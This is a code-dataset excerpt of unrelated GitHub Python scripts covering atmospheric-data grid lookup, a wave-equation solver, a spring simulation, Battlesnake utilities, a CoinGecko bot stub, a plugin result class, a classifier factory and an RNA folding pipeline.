np.asarray(array2)\n idx = (np.abs(array1 - value1)+np.abs(array2 - value2)).argmin()\n return array1[idx], array2[idx], idx\n\n\n#Christians data 9km VIE center (exact: 48.196613 16.382294)\ninfile = '/windata/DATA/models/boku/wrf/120521/9km_3km_2domain/wrfout_d01_2019-07-01_00:00:00'\nwest_east = 198\nsouth_north = 135\nnci = netCDF4.Dataset(infile)\nprint(nci.variables['XLAT'][1,69,99]) #48.200005\nprint(nci.variables['XLONG'][1,69,99]) #16.400024\n#Christians data 9km Rutzendorf (exact: 48.206673 16.623864)\nprint(nci.variables['XLAT'][1,69,101]) #48.199753\nprint(nci.variables['XLONG'][1,69,101]) #16.642914\n\nexit()\n\n#TROPOMI SIF 1D\ninfile1 = netCDF4.Dataset('/windata/DATA/remote/satellite/TROPOMI/2020/06/TROPOSIF_L2B_2020-06-01.nc')\ninfile2 = netCDF4.Dataset('/windata/DATA/remote/satellite/TROPOMI/2020/06/TROPOSIF_L2B_2020-06-02.nc')\ninfile1_data = infile1['/PRODUCT']\ninfile2_data = infile2['/PRODUCT']\nn_elem = 2421884\n#print(infile1_data.variables['longitude'][1021884]) #48.192i142\n#print(infile2_data.variables['longitude'][1021884]) #48.192142\n\n#print(find_nearest(infile1_data.variables['longitude'], 16)\n#print(find_nearest(infile1_data.variables['latitude'], 48))\nprint(\"CE\", find_nearest_xy(infile1_data.variables['latitude'], 48.196613, infile1_data.variables['longitude'], 16.382294))\nprint(\"CE\", find_nearest_xy(infile2_data.variables['latitude'], 48.196613, infile2_data.variables['longitude'], 16.382294))\n\nprint(\"RU\", find_nearest_xy(infile1_data.variables['latitude'], 48.192142, infile1_data.variables['longitude'], 16.624939))\nprint(\"RU\", find_nearest_xy(infile2_data.variables['latitude'], 48.192142, infile2_data.variables['longitude'], 16.624939))\n\nexit()\n\n#Jans data 3km VIE center\ninfile = '/media/heidit/Norskehavet/EMEPData/OUTPUT/wrfout_d02_2020-01-01_00:00:00'\nnci = netCDF4.Dataset(infile)\n#print(nci.variables['XLAT'][1,76,181]) #48.19662\n#print(nci.variables['XLONG'][1,76,181]) #16.382263\n\n#Jans data 9km VIE center\ninfile = '/media/heidit/Norskehavet/EMEPData/OUTPUT/2020_4/wrfout_d01_2020-03-31_01:00:00'\nwest_east = 189\nsouth_north = 165\nnci = netCDF4.Dataset(infile)\nprint(nci.variables['XLAT'][1,59,110]) #48.196613\nprint(nci.variables['XLONG'][1,59,110]) #16.382294\n#Jans data 9km Rutzendorf\nprint(nci.variables['XLAT'][1,59,112]) #48.192142\nprint(nci.variables['XLONG'][1,59,112]) #16.624939\n\n#find Bosco Fontana, IT\nin_lat = 45.199292\nin_lon = 10.7399\nprint(nci.variables['XLAT'][1,23,62])\nprint(nci.variables['XLONG'][1,23,62])\n\n#find O3HP, FR (Saint-Michel-l'Observatoire, 04870 France)\nin_lat = 43.9311448\nin_lon = 5.713935\nprint(nci.variables['XLAT'][1,11,16])\nprint(nci.variables['XLONG'][1,11,16])\n\nexit()\n#find Vielsalm, BE\nin_lat = 50.30\nin_lon = 5.99\nprint(nci.variables['XLAT'][1,89,27]) #\nprint(nci.variables['XLONG'][1,89,27])\n\nlats = nci.variables['XLAT'][1,89,:]\nlons = nci.variables['XLONG'][1,:,27]\nlat_idx = geo_idx(in_lat, lats)\nlon_idx = geo_idx(in_lon, lons)\nprint(lat_idx,lon_idx)\n#iy = lat_idx%south_north\n#ix = lon_idx%west_east\n#50.332256\n#5.9249268\n\n\n","repo_name":"ln-x/met","sub_path":"5_UOZONE/notused/1a_extractFluxOBS_indices.py","file_name":"1a_extractFluxOBS_indices.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"73051714010","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom functions import *\r\n\r\n#Funktion (exp used in paper)\r\ndef f(x, t):\r\n w = 2*np.pi\r\n k = 2*np.pi\r\n # np.exp(-k*x**2)\r\n return np.exp(-k*x**2)\r\n\r\n\r\n\r\ndef waveequation(x, t, h_x, h_t, bc):\r\n\r\n if bc == \"periodic\":\r\n phi_0 = np.zeros(len(x) + 2) # Phi(x, t = 0)\r\n phi_0[1:-1] = f(x, 0)\r\n phi_0[0] = phi_0[-3] # add Ghostpoints\r\n phi_0[-1] = phi_0[2]\r\n\r\n pi_0 = np.zeros(len(x)) \t # Pi(x, t = 0)\r\n pi_0 = -1*first_derivative(phi_0, h_x) # -1 für richtung der welle\r\n\r\n\r\n elif bc == \"open_i\":\r\n phi_0 = np.zeros(len(x) + 2) # Phi(x, t = 0)\r\n phi_0[1:-1] = f(x, 0)\r\n phi_0[0] = phi_0[1] - (phi_0[2] - phi_0[1])\r\n phi_0[-1] = phi_0[-2] + (phi_0[-2] - phi_0[-3])\r\n\r\n pi_0 = np.zeros(len(x)) \t # Pi(x, t = 0)\r\n pi_0 = -1*first_derivative(phi_0, h_x) # -1 für richtung der welle\r\n\r\n elif bc == \"open_ii\":\r\n phi_0 = np.zeros(len(x) + 2) # Phi(x, t = 0)\r\n phi_0[1:-1] = f(x, 0)\r\n phi_0[0] = phi_0[1] - phi_0[2] # add Ghostpoints\r\n phi_0[-1] = phi_0[-2] - phi_0[-3]\r\n\r\n pi_0 = np.zeros(len(x)) \t # Pi(x, t = 0)\r\n pi_0 = -1*first_derivative(phi_0, h_x) # -1 für richtung der welle\r\n\r\n #--------------------------------------------------------------------\r\n solution = [phi_0[1:-1], pi_0]\r\n\r\n def dgl(t, solution): # PDE of waveequation + boundary conditions\r\n if bc == \"periodic\":\r\n phi = np.zeros(len(solution[0]) + 2)\r\n phi[1:-1] = solution[0]\r\n phi[0] = solution[0][-3]\r\n phi[-1] = solution[0][2]\r\n\r\n if bc == \"open_i\":\r\n phi = np.zeros(len(solution[0]) + 2)\r\n phi[1:-1] = solution[0]\r\n phi[0] = phi[1] - (phi[2] - phi[1])\r\n phi[-1] =phi[-2] + (phi[-2] - phi[-3])\r\n\r\n if bc == \"open_ii\":\r\n phi = np.zeros(len(solution[0]) + 2)\r\n phi[1:-1] = solution[0]\r\n pi = solution[1]\r\n\r\n phi[0] = phi[2] - 2*h_x*pi[0]\r\n phi[-1] = phi[-3] - 2*h_x*pi[-1]\r\n\r\n\r\n\r\n dphidt = solution[1]\r\n dpidt = second_derivative(phi, h_x)\r\n u_punkt = np.array([dphidt, dpidt])\r\n return u_punkt\r\n\r\n yout, t = rungekutta(solution, t, dgl)\r\n\r\n return yout, t\r\n\r\n\r\n#------------------------------------------------------------------------------\r\n#convergence\r\n#calculate the convergence with max norm and euklidian norm\r\ndef wave_convergence(h_x, h_t, x_start, x_end, t_start, t_end, bc):\r\n h_xc = [h_x, h_x/2, h_x/4]\r\n h_tc = [h_t, h_t/2, h_t/4]\r\n\r\n N_xc = [int((x_end - x_start)/h_xc[0] + 1),int((x_end - x_start)/h_xc[1] + 1),int((x_end - x_start)/h_xc[2] + 1)]\r\n N_tc = [int((t_end - t_start)/h_tc[0] + 1),int((t_end - t_start)/h_tc[0] + 1),int((t_end - t_start)/h_tc[0] + 1)]\r\n\r\n xc = [np.linspace(x_start, x_end, N_xc[0]),np.linspace(x_start, x_end, N_xc[1]),np.linspace(x_start, x_end, N_xc[2])]\r\n tc = [np.linspace(t_start, t_end, N_tc[0]),np.linspace(t_start, t_end, N_tc[1]),np.linspace(t_start, t_end, N_tc[2])]\r\n\r\n yout1, t1 = waveequation(xc[0], tc[0], h_xc[0], h_tc[0], bc)\r\n yout2, t2 = waveequation(xc[1], tc[1], h_xc[1], h_tc[1], bc)\r\n yout4, t4 = waveequation(xc[2], tc[2], h_xc[2], h_tc[2], bc)\r\n\r\n\r\n\r\n #Euklidische Norm\r\n selvcon = np.zeros(len(tc[0]))\r\n\r\n #maximumsnorm\r\n max = np.zeros(len(tc[0]))\r\n\r\n for i in range(len(tc[0])):\r\n selvcon[i] = selfconvergence(yout1[i,0,:], yout2[i,0,::2], yout4[i,0,::4]) #euklidisch\r\n max[i] = maxnorm(yout1[i,0,:], yout2[i,0,::2], yout4[i,0,::4]) #maxnorm\r\n\r\n return selvcon, max, tc\r\n#-----------------------------------------------------------------------------\r\n#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n#Globale parameter\r\n#start and end point of x\r\nx_start = -1\r\nx_end = 1\r\n\r\n#start and end of t\r\nt_start = 0\r\nt_end = 2\r\n\r\n#step scize Delta x and Delta t\r\nh_x = 0.1\r\nh_t = 0.01\r\n\r\n#velocity\r\nc = 1\r\n\r\nalpha = c*h_t/h_x\r\nprint(\"alpha = \", alpha)\r\n\r\n#define spacial grdid and time grid\r\nN_x = int((x_end - x_start)/h_x + 1)\r\nN_t = int((t_end - t_start)/h_t + 1)\r\n\r\nx = np.linspace(x_start, x_end, N_x)\r\nt = np.linspace(t_start, t_end, N_t)\r\n\r\n#---------------------------------------------------------------------\r\n\r\n\r\n#print the wave: choose the boundary conditions between 'periodic', 'open_i' and 'open_ii'\r\nyout, t = waveequation(x, t, h_x, h_t, 'periodic') # yout = [Phi, Pi]\r\n\r\n\r\n#hcalculate selfconvergence: choose the boundary conditions between 'periodic', 'open_i' and 'open_ii'\r\nselvcon2, max, tc2 = wave_convergence(h_x, h_t, x_start, x_end, t_start, t_end, 'periodic') #selvcon2 = euklidische norm\r\n # max = maximum norm\r\n # tc2 = time\r\n#plots\r\nplt.figure()\r\nplt.plot(tc2[0], max, label = 'open bc')\r\nplt.xlabel('t')\r\nplt.ylabel('Q')\r\nplt.ylim(0, 4)\r\nplt.grid()\r\n#plt.title('Q(t) selfconvergence $\\\\alpha$ = %1.3f' %alpha)\r\nplt.legend(loc='upper right')\r\n\r\n\r\n\r\nplt.figure()\r\nplt.pcolor(x, t, yout[:,0], label = '$\\\\alpha$ = %1.3f' %alpha)\r\nplt.ylabel('t')\r\nplt.xlabel('x')\r\nplt.colorbar()\r\nplt.title('$\\\\phi(x, t)$')\r\nplt.legend()\r\nplt.show()\r\n","repo_name":"Aemmel/Wave-Equation-Research-Lab-Project","sub_path":"main-task/wave_equation.py","file_name":"wave_equation.py","file_ext":"py","file_size_in_byte":5541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25203016885","text":"import numpy as np\nimport numpy.linalg as la\n\nimport matplotlib.pyplot as plt\n\nclass System:\n def __init__(self, A, x):\n self.A = A\n self.x = x\n\n def update(self, dt):\n dx_dt = self.A @ self.x\n self.x = self.x + ((dx_dt) * dt)\n\n return self.x, dx_dt\n\ndef plot_system(system, iters, dt): # integrates really poorly\n time = 0\n\n X = []\n Y = []\n U = []\n V = []\n\n for _ in range(iters):\n # print(f'({spring.x[0]}, {spring.x[1]}), ({time}, {spring.x[0]}), ({time}, {spring.x[1]}), ', end='')\n x, dx_dt = system.update(dt)\n\n X.append(x[0])\n Y.append(x[1])\n U.append(dx_dt[0])\n V.append(dx_dt[1])\n\n\n time += dt\n\n plt.quiver(X, Y, U, V)\n plt.show()\n\ndef plot_system_2(system, iterations, dt):\n eigvals, eigvecs = la.eig(system.A)\n def x(t):\n return sum(np.exp(value * t) * vector for value, vector in zip(eigvals, eigvecs))\n \n time = 0\n X = []\n Y = []\n\n for i in range(iterations):\n state = np.real(x(time))\n\n X.append(state[0])\n Y.append(state[1])\n\n time += dt\n\n plt.plot(X, Y)\n plt.show()\n\n\ndef plot_system_3(system, total_time, dt):\n eigvals, eigvecs = la.eig(system.A)\n def x(t):\n return sum(np.exp(value * t) * vector for value, vector in zip(eigvals, eigvecs))\n \n T=[]\n X=[]\n\n time = 0\n while time <= total_time:\n state = np.real(x(time))[0]\n T.append(time)\n X.append(state)\n time += dt\n\n return T, X\n\nk = 1.2\nb = 0.0\nm = 1.0\n\nA = np.array([[ 0, 1 ],\n [-k/m, -b/m]])\n\nx = np.array([ 1, 0 ])\n\n\nspring = System(A, x)\n\ndt = 0.1\ntime = 0\n\nfig, ax = plt.subplots()\n\nT, X = plot_system_3(spring, 10, dt)\ntext = f'k={k:.3}N/m, m={m:.3}kg, b={b:0.3}Ns/m'\nax.plot(T, X)\nax.set_title('Spring position vs time (' + (r'$' + text +'$)'))\nax.set_xlabel('Time (s)')\nax.set_ylabel('Position (m)')\nplt.show()\n\n# import time\n# fig.savefig(f'./output-{int(time.time() * 10**4)}.png', dpi=75, bbox_inches='tight', pad_inches=0.1)\n","repo_name":"selym3/control-theory-presentation","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25650533436","text":"import Queue\n\nfrom coord import Coord, UP, DOWN, LEFT, RIGHT\n\n\ndef flatten(l):\n \"\"\"Flatten list of lists to list of items.\"\"\"\n return [item for sublist in l for item in sublist]\n\n\ndef map_to_one(v, l, h):\n \"\"\"Map a value v in range (l, h) to (0, 1).\"\"\"\n return ((v - l) / (h - l)) * (1 - 0) + 0\n\n\ndef clamp(point, min, max):\n return min if point < min else max if point > max else point\n\n\ndef intersect(a, b):\n \"\"\"Return the intersection of two lists.\"\"\"\n return list(set(a) & set(b))\n\n\ndef average_length(snakes):\n \"\"\"Get average length for a list of snakes\"\"\"\n return sum([snake.length() for snake in snakes]) / len(snakes)\n\n\ndef flood_fill(game, coord):\n '''\n Flood fill an area, giving opponent snakes a chance to expand before checking if it's large enough to enter\n :param game: A game object\n :param coord: A coordinate to try\n :return: Number of empty cells immediately reachable if this move is chosen\n '''\n\n class Cell(Coord):\n def __init__(self, c, type):\n Coord.__init__(self, c)\n self.cell_type = 'wall' if type == 1 else 'body' if type == 2 else 'head' if type == 3 else 'open'\n self.visited = False\n\n def __str__(self):\n return \"{}\".format(\"+\" if self.cell_type == 'wall' and self.visited\n else \"X\" if self.cell_type == 'wall'\n else \"*\" if self.cell_type == 'body'\n else \"@\" if self.cell_type == 'head'\n else \".\" if self.visited\n else \" \"\n )\n\n def __repr__(self):\n return self.__str__()\n\n def markup(board):\n return [[Cell([x, y], cell) for x, cell in enumerate(row)]\n for y, row in enumerate(board)]\n\n board = markup(game.board)\n\n # Before the fill, move the opponent snake heads out one in each way\n for snake in game.other_snakes:\n \n if board[snake.head().up().y + 1][snake.head().x + 1].cell_type == 'open':\n board[snake.head().up().y + 1][snake.head().x + 1].cell_type = 'wall'\n\n if board[snake.head().down().y + 1][snake.head().x + 1].cell_type == 'open':\n board[snake.head().down().y + 1][snake.head().x + 1].cell_type = 'wall'\n\n if board[snake.head().y + 1][snake.head().left().x + 1].cell_type == 'open':\n board[snake.head().y + 1][snake.head().left().x + 1].cell_type = 'wall'\n\n if board[snake.head().y + 1][snake.head().right().x + 1].cell_type == 'open':\n board[snake.head().y + 1][snake.head().right().x + 1].cell_type = 'wall'\n\n # 3. Set Q to the empty queue.\n Q = Queue.Queue()\n\n # 4. Add node to Q.\n start = board[coord.y + 1][coord.x + 1]\n start.visited = True\n start.type = 3 # Our head goes there\n Q.put(start)\n\n # 5. For each element N of Q:\n space = 0\n while not Q.empty():\n\n # 6. Set west and east equal to the current spot.\n spot = Q.get()\n west = spot\n east = spot\n\n next_west = board[west.y][west.left().x]\n next_east = board[east.y][east.right().x]\n\n # 7. Move west to the left until\n # - the cell to the left of west no longer open.\n while next_west.cell_type == 'open' and next_west.visited == False:\n west = next_west\n next_west = board[next_west.y][next_west.x - 1]\n\n # 8. Move east to the right until\n # - the cell to the right of east no longer open.\n while next_east.cell_type == 'open' and next_east.visited == False:\n east = next_east\n next_east = board[next_east.y][next_east.x + 1]\n\n # 9. For each cell between west and east:\n for x in range(west.x, east.x + 1):\n\n # 10. Set the this cell visited\n point = board[spot.y][x]\n point.visited = True\n\n # Keep track of total found space\n space += 1\n\n # There's enough space to move there\n if space > 2 * game.me.length():\n return space\n\n # 11. If the cell to the north of this is unvisited, add that cell to Q.\n y = clamp(point.up().y, 0, game.height)\n if not board[y][x].visited and board[y][x].cell_type == 'open':\n Q.put(board[y][x])\n\n # 12. If the cell to the south of this is unvisited, add that cell to Q.\n y = clamp(point.down().y, 0, game.height)\n if not board[y][x].visited and board[y][x].cell_type == 'open':\n Q.put(board[y][x])\n\n # 13. Continue looping until Q is exhausted or there's enough space\n\n return space\n\n\ndef dir_str_to_direction(d_str, game):\n head = game.me.head()\n\n if d_str == UP:\n return head.up()\n if d_str == DOWN:\n return head.down()\n if d_str == LEFT:\n return head.left()\n if d_str == RIGHT:\n return head.right()\n","repo_name":"coffee-cup/battlesnake-2017","sub_path":"app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17334694161","text":"from pycoingecko import CoinGeckoAPI\r\nimport discord\r\nfrom discord.ext import commands\r\n\r\nbot = commands.Bot(command_prefix='?',description='Bot')\r\n\r\ntoken = 'Bot Token'\r\n\r\nurl = 'https://api.coingecko.com/api/v3/'\r\n\r\nclass CoinGecko():\r\n def price(self, ids, vs_currencies, include_market_cap):\r\n query = {\r\n 'ids': ids,\r\n 'vs_currencies': vs_currencies,\r\n 'include_market_cap': include_market_cap\r\n }\r\n\r\n response = requests.get(url + 'simple/price', params=query).json()\r\n\r\n return response\r\n\r\n def supported_currencies(self):\r\n response = requests.get(url + 'simple/supported_vs_currencies').json() \r\n\r\n return response\r\n\r\n def search(self, keyword=''):\r\n query = {'query': keyword}\r\n\r\n response = requests.get(url + 'search', params=query).json()['coins'][0]['name']\r\n\r\n return response\r\n\r\ncg = CoinGecko()\r\n\r\n#price = cg.price(ids='ethereum', vs_currencies='sats', include_market_cap='false')\r\n#supported_c = cg.supported_currencies()\r\nsearch = cg.search('')\r\n\r\n#print(price)\r\n#print(list)\r\nprint(search)\r\n","repo_name":"salmen1234/CoinGecko-Discord-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1835896186","text":"from typing import Optional\nimport json\nfrom datetime import datetime, date, time, timedelta\nfrom mako.template import Template\nimport mako.exceptions\nimport sysinvest.common.plugin.constants as const\nimport logging\n\n\nclass PluginResultEncoder( json.JSONEncoder ):\n def default( self, obj ):\n if isinstance( obj, Exception ):\n return str( obj )\n\n return obj\n\n\nclass HasAttribute( object ):\n def __init__( self, attrs ):\n self.__attrs = attrs\n return\n\n def __call__(self, *args, **kwargs):\n result = True\n for arg in args:\n if arg not in self.__attrs:\n result = False\n break\n\n return result\n\n\nclass PluginResult( object ):\n EXC_TEMPLATE = \"${name} => ${result} ${message}\"\n TEMPLATE = \"${name} => ${result}\"\n\n def __init__( self, plugin: 'Plugin' ):\n self.log = logging.getLogger( 'result' )\n self.__result = False\n self.__message = 'Collecting data'\n self.__state = 1\n self.__data = {}\n self.__plugin = plugin\n for k, v in self.__plugin.Parent.info().items():\n self.__data[ k ] = v\n\n return\n\n def update( self, result: bool, message: str, data: dict = None, **kwargs ):\n self.__state = 2\n self.__result = result\n self.__message = message\n self.__data.update( data if isinstance( data, dict ) else {} )\n for k, v in kwargs.items():\n self.__data[ k ] = v\n\n for k, v in self.Plugin.Parent.info().items():\n self.__data[ k ] = v\n\n self.log.info( f\"PluginResult.update( {result}, '{message}', {data}, **{kwargs} )\" )\n return\n\n @property\n def Name( self ) -> str:\n return self.__plugin.Name\n\n @property\n def Result( self ) -> bool:\n return self.__result\n\n @Result.setter\n def Result( self, value: bool ):\n self.__result = value\n return\n\n @property\n def Message( self ) -> str:\n return self.__message\n\n @Message.setter\n def Message( self, value: str ):\n self.__message = value\n return\n\n @property\n def Details( self ) -> dict:\n return self.__data\n\n @property\n def Plugin( self ) -> 'Plugin':\n return self.__plugin\n\n def buildMessage( self, translate: Optional[list] = None ) -> str:\n result = ''\n kwargs = {\n 'result': self.__result,\n 'name': self.Name,\n 'message': self.__message,\n }\n kwargs.update( self.__data )\n kwargs[ 'hasAttribute' ] = HasAttribute( kwargs )\n kwargs[ 'datetime' ] = datetime\n kwargs[ 'date' ] = date\n kwargs[ 'time' ] = time\n kwargs[ 'timedelta' ] = timedelta\n try:\n if const.C_EXCEPTION in self.__data:\n return Template( self.EXC_TEMPLATE ).render( **kwargs )\n\n template = self.Plugin.Template if self.Plugin.Template is not None else self.TEMPLATE\n result = Template( template ).render( **kwargs ).strip( ' \\r\\n' )\n if isinstance( translate, list ):\n try:\n for ch, tr in translate:\n result = result.replace( ch, tr )\n\n except Exception:\n self.log.exception( f\"During translate \" )\n\n\n except NameError:\n self.log.error( f\"{mako.exceptions.text_error_template().render()}\\n{kwargs}\" )\n\n return result\n\n def __repr__(self):\n return f\"\"\n\n def dump( self ):\n print( f\"PluginResult {self.Name}: {self.__result} :: {self.__message}\" )\n if self.__data:\n print( self.__data )\n\n def toJson( self ):\n return {\n \"name\": self.Name,\n \"result\": self.Result,\n \"message\": self.buildMessage()\n }","repo_name":"pe2mbs/sysinvest","sub_path":"sysinvest/common/plugin/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23058505744","text":"import copy\n\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom Classification_Project.IllegalArgumentException import IllegalArgumentException\n\n\nclass ClassifierFactory:\n def __init__(self):\n self.classifier_prototypes = []\n\n self.classifier_prototypes.append(DecisionTreeClassifier())\n self.classifier_prototypes.append(RandomForestClassifier())\n self.classifier_prototypes.append(ExtraTreesClassifier())\n self.classifier_prototypes.append(LogisticRegression())\n self.classifier_prototypes.append(MLPClassifier())\n self.classifier_prototypes.append(LinearSVC())\n self.classifier_prototypes.append(SVC())\n\n def get_classifier(self, classifier_class_name, params_dictionary):\n classifier = copy.deepcopy(self.__find_prototype(classifier_class_name))\n\n self.__fill_classifier_params(classifier, params_dictionary)\n\n return classifier\n\n def __fill_classifier_params(self, classifier, params_dictionary):\n for param in params_dictionary:\n if not hasattr(classifier, param):\n raise IllegalArgumentException('%s doesn\\'t contain %s parameter.' % type(classifier).__name__,\n param)\n\n setattr(classifier, param, params_dictionary[param])\n\n def __find_prototype(self, classifier_class_name):\n for proto in self.classifier_prototypes:\n if type(proto).__name__.lower() == classifier_class_name.lower():\n return proto\n\n raise IllegalArgumentException('Given classifier name is incorrect. There is no classifier with name %s.' %\n classifier_class_name)\n\n","repo_name":"DmytroSavchuk/PythonClassificationBack","sub_path":"Classification_Project/ClassifierFactory.py","file_name":"ClassifierFactory.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"21545246249","text":"# Import systems\nimport re, os, sys, csv, scipy, shutil, subprocess\nimport numpy as np\nimport pandas as pd\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\nfrom scipy import stats\nfrom Bio.Alphabet import IUPAC\nfrom subprocess import PIPE, run\nfrom transcripts_info import dict_transcripts\n\ndef out(command):\n result = run(command, stdout = PIPE, stderr = PIPE, \\\n universal_newlines = True, shell = True)\n return result.stdout\n\n# DCX is a reverse transcribed gene, therefore the start location\n# is actually the 'end' location\ndef getStartLocation(input_file):\n records = SeqIO.parse(open(input_file), 'fasta')\n record = next(records)\n parts = record.description.split(':')\n location = parts[-2]\n if location.isdigit():\n start_location = int(location)\n else:\n start_location = int(len(record.seq))\n return start_location\n\n# Not needed in this case\ndef getEndLocation(input_file):\n records = SeqIO.parse(open(input_file), 'fasta')\n record = next(records)\n parts = record.description.split(':')\n end_location = parts[-3]\n return end_location\n\ndef doTranscribeRNA(input_file):\n for record in SeqIO.parse(open(input_file), 'fasta'):\n sequence = record.seq\n return sequence\n\ndef doFragmentTranscript(gene_sequence, gene_start_location, \\\n fragment_step, fragment_length):\n d = {}\n count = 0\n start = gene_start_location\n for i in range(0, len(str(gene_sequence)), fragment_step):\n v = str(gene_sequence)[(count):(count+fragment_length)]\n if len(v) == fragment_length:\n k = str(start) + '_' + str(start-len(v)+1)\n d[k] = v\n count += fragment_step\n start -= fragment_step\n elif len(v) == len(v)%fragment_length:\n break\n return d\n\ndef runShuffleAndFold(input_file, dictionary, temp_file,\\\n temp_copy_file, cmd_shuffle, cmd_fold):\n f = input_file.split('.')\n file_name = f[0] + '_output.' + f[1]\n ofile = open(file_name, 'w')\n for key, value in dictionary.items():\n ofile.write('>' + key + '\\n' + \\\n value + '\\n')\n tempofile = open(temp_file, 'w')\n tempofile.write('>' + key + '\\n' + \\\n value + '\\n')\n tempofile.close()\n shuffled = out(cmd_shuffle)\n ofile.write(shuffled)\n ofile.close()\n # run RNAfold\n shutil.copyfile(file_name, temp_copy_file)\n in_RNAfold = open(temp_copy_file, 'r')\n out(cmd_fold)\n # remove/move files\n cmd = ('find . -name \"*.ps\" -delete')\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell = True)\n os.remove(temp_file)\n os.remove(temp_copy_file)\n return\n\ndef doCsvFile(fasta_file, n_random):\n with open (fasta_file, 'r') as f:\n lines = f.read().splitlines()\n # list of IDs\n id_line = lines[0::3]\n secondary_IDs = [] # list of secondary IDs\n for x in id_line:\n x = x.replace('>', '')\n secondary_IDs.append(x)\n item_IDs = secondary_IDs[::int(n_random+1)]\n primary_IDs = [] # list of primary IDs\n for x in item_IDs:\n x = x.replace('>', '')\n count = 0\n while count < (n_random+1):\n primary_IDs.append(x)\n count += 1\n # list of sequences\n sequences = list(lines[1::3])\n # list of fold\n third_line = list(lines[2::3])\n fold = []\n p_1 = re.compile(r'^([\\S]+)') # regex for fold\n for i in third_line:\n fold += p_1.findall(i)\n # list of energy\n energy = []\n p_2 = re.compile(r'\\s\\((.*?)\\)') # regex for energy\n for i in third_line:\n energy += p_2.findall(i)\n # make csv from dictionary\n d = {'Primary ID':primary_IDs, 'Secondary ID':secondary_IDs, \\\n 'Sequence':sequences, 'Fold':fold, 'MFE':energy}\n df = pd.DataFrame(d)\n file_name = (fasta_file.split('.'))[0] + '.csv'\n with open (file_name, 'w') as f:\n df.to_csv(f, sep = '\\t', index=False)\n f.close()\n return\n\ndef doZscore(csv_file, n_random):\n df = pd.read_csv(csv_file, sep = '\\t')\n row_start = 0\n row_end = n_random + 1\n step = n_random + 1\n zscore = []\n while row_end <= len(df):\n selected_rows = df['MFE'].iloc[row_start:row_end]\n arr = []\n for x in selected_rows:\n arr.append(round(float(x)))\n if arr.count(0) == len(arr):\n scores = arr\n else:\n scores = stats.zscore(arr)\n for i in scores:\n zscore.append(round(i, 3))\n arr.clear()\n row_start += step\n row_end += step\n df['Zscore'] = zscore\n with open(csv_file, 'w') as f:\n df.to_csv(f, index=False)\n f.close()\n return\n\n\ndef doPvalue(csv_file):\n df = pd.read_csv(csv_file)\n pvalue = []\n selected_rows = df['Zscore']\n for x in selected_rows:\n pvalue.append(float((round(scipy.stats.norm.sf((abs(x))*2), 3))))\n df['Pvalue'] = pvalue\n with open(csv_file, 'w') as f:\n df.to_csv(f, index=False)\n f.close()\n return\n\ndef doClusters(csv_file, pvalue, energy, fragment_length, \\\n gene_sequence, gene_start_location, \\\n fragment_overlap):\n # Reading first RNA fold output csv file and selecting\n # rows of interest and append them onto a list\n df = pd.read_csv(csv_file)\n df_primary_rows = pd.DataFrame()\n df_primary_rows = df[(df['Primary ID'] == df['Secondary ID']) &\\\n (df['MFE'] <= energy) &\\\n (df['Pvalue'] <= pvalue)]\n primary_list = df_primary_rows['Primary ID'].tolist()\n # Making a list of tuples for the locations\n loc_list = []\n for x in primary_list:\n start_location = (x.split('_'))[1]\n end_location = (x.split('_'))[0]\n loc_list.append((start_location, end_location))\n # Sorting locations\n sorted_by_lower_bound = sorted(loc_list, key=lambda tup: tup[0])\n merged = []\n # Making clusters\n for higher in sorted_by_lower_bound:\n if not merged:\n merged.append(higher)\n else:\n lower = merged[-1]\n if int(lower[1])-int(higher[0]) >= int(fragment_overlap):\n upper_bound = max(lower[1], higher[1])\n merged[-1] = (lower[0], upper_bound)\n else:\n if (int(higher[1])-int(higher[0])) >= int(int(fragment_length)-1):\n merged.append(higher)\n final_cluster_list = []\n for x in merged:\n if int(x[1])-int(x[0]) > int(int(fragment_length)-1):\n final_cluster_list.append(x)\n else:\n final_cluster_list.append(x)\n final_cluster_list.sort(reverse=True)\n return final_cluster_list \n\ndef doClusterShuffleAndFold(input_file, cluster_list, gene_start_location, \\\n gene_sequence, cluster_fasta_file_name, temp_file, \\\n temp_copy_file, cmd_shuffle, cmd_fold_cluster):\n cluster_dictionary = {}\n for cluster in cluster_list:\n cluster_start = cluster[1]\n cluster_end = cluster[0]\n cluster_location = cluster_end + '_' + cluster_start\n len_cluster = int(cluster_start) - int(cluster_end)\n index_start_sequence = int(gene_start_location) - int(cluster_start)\n index_end_sequence = int(index_start_sequence) + int(len_cluster)\n cluster_sequence = (str(gene_sequence))[slice(index_start_sequence, \\\n index_end_sequence)]\n cluster_dictionary[cluster_location] = cluster_sequence\n f = input_file.split('.')\n file_name = f[0] + '_cluster_output.' + f[1]\n ofile = open(file_name, 'w')\n for key, value in cluster_dictionary.items():\n ofile.write('>' 